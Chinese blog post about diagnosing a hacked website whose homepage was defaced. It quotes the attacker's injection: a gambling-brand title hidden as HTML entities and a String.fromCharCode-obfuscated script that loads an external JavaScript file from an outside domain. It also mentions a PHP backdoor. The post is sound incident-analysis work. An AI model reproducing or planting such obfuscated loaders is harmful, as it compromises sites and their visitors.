黑客攻击网站,篡改首页问题排查修复

sunphp开发者2024-12-27 8:28

1,修改首页,并植入js

标题通过unicode编码,隐藏了

<title>&#24320;&#20113;&#40;&#20013;&#22269;&#41;&#75;&#97;&#105;&#121;&#117;&#110;&#183;&#23448;

js文件通过String.fromCharCode隐藏起来了

<script type="text/javascript"> var xt = String.fromCharCode(0,60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,120,106,115,56,56,50,46,99,111,109,47,121,98,46,106,115,34,62,60, 47,115, 99,114,105,112,116,62); document.write(xt);

2,加入php后门

解码后在实际攻击内容如下

相关推荐
吳所畏惧26 分钟前
少走弯路:uniapp里将h5链接打包为apk,并设置顶/底部安全区域自动填充显示,阻止webview默认全屏化
android·安全·uni-app·json·html5·webview·js
金士顿1 小时前
Ethercat耦合器添加的IO导出xml 初始化IO参数
android·xml·java
电饭叔1 小时前
Luhn算法与信用卡识别完善《python语言程序设计》2018版--第8章14题利用字符串输入作为一个信用卡号之三
android·python·算法
漏洞文库-Web安全1 小时前
CTFHub-RCE漏洞wp
android·安全·web安全·网络安全·ctf·ctfhub
享哥。1 小时前
MVI 模式及mvp,mvvm对比
android
非情剑2 小时前
Java-Executor线程池配置-案例2
android·java·开发语言
JienDa2 小时前
JienDa聊PHP:PHP 8革命性特性深度实战报告:枚举、联合类型与Attributes的工程化实践
android·开发语言·php
向葭奔赴♡2 小时前
Android AlertDialog实战:5种常用对话框实现
android·java·开发语言·贪心算法·gitee
峥嵘life3 小时前
Android EDLA 搭建Linux测试环境简介
android·linux·运维
热门推荐
01GitHub 镜像站点02React CVE-2025-55182漏洞排查与修复指南03【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05UV安装并设置国内源06BongoCat - 跨平台键盘猫动画工具07智能库存管理的需求预测模型:从业务痛点到落地代码的完整实践08本地部署阿里最新开源的Z-Image09Linux下V2Ray安装配置指南10论文阅读 - 深度学习端到端解决库存管理问题 - 有限时间范围内的多周期补货问题(Management Science)